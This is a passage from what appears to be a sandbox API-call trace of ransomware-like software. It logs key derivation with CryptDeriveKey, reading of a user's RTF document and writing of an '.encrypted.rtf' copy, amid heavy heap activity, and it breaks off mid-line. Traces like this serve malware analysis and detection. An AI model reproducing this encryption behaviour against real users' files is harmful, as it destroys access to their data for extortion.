[0035.980] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.980] CryptHashData (hHash=0x7c2240, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0035.980] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.980] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0035.980] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.980] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2200) returned 1 [0035.980] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.980] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.980] CryptDestroyHash (hHash=0x7c2240) returned 1 [0035.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0035.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0035.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0035.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0035.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0035.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0035.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0035.981] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\XjUfY.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\xjufy.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0035.981] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.981] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0035.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0035.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0035.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0035.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0035.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0035.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0035.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0035.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0035.981] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0035.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0035.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0035.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0035.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0035.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0035.981] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0035.981] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0035.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0035.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0035.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0035.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0035.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0035.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0035.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0035.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0035.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0035.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0035.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0035.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0035.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0035.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0035.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0035.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0035.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0035.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0035.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0035.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0035.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0035.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0035.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0035.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0035.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0035.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb0) returned 0x7c55e8 [0035.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0035.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c38b0 [0035.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0035.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c3818 [0035.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c55e8 | out: hHeap=0x770000) returned 1 [0035.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0035.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0035.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0035.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0035.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c38b0 | out: hHeap=0x770000) returned 1 [0035.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0035.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0035.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0035.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0035.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c38b0 [0035.983] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66")) returned 0x10 [0035.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c38b0 | out: hHeap=0x770000) returned 1 [0035.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0035.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c3818 | out: hHeap=0x770000) returned 1 [0035.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0035.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0035.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0035.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0035.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0035.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0035.983] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\XjUfY.encrypted.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\xjufy.encrypted.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0035.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0035.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0035.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0035.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0035.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0035.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0035.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0035.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0035.984] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0035.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0035.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0035.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0035.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0035.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0035.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0035.984] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0035.984] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0035.984] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0035.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0035.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0035.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0035.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0035.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0035.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0035.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0035.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0035.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0035.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0035.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0035.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0035.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0035.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0035.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0035.985] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0035.985] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0035.987] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x276b, lpOverlapped=0x0) returned 1 [0035.987] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0035.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0035.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0035.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0035.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0035.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1276b) returned 0x955018 [0035.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0035.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0035.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0035.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0035.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0035.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0035.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1276b) returned 0x967790 [0035.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0035.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0035.990] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0035.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0035.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0035.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0035.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0035.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1276b) returned 0x955018 [0035.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0035.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0035.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0035.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0035.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0035.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0035.990] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0035.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0035.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0035.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0035.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0035.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0035.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0035.991] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0035.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0035.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0035.991] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0035.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0035.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0035.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da188 [0035.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0035.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0035.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0035.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0035.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1276b) returned 0x955018 [0035.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0035.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da228 [0035.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0035.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0035.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0035.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da148 [0035.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0035.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0035.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0035.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1a8 [0035.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0035.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0035.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0035.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889ac0 [0035.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0035.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0035.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0035.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0035.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0035.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1276b) returned 0x979f08 [0035.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0035.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0035.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0035.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0035.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0035.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0035.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0035.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0035.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0035.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0035.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0035.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0035.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0035.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0035.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0035.993] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0035.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0035.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0035.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0035.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0035.993] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0035.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0035.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0035.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0035.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0035.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0035.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0035.993] RtlAllocateHeap 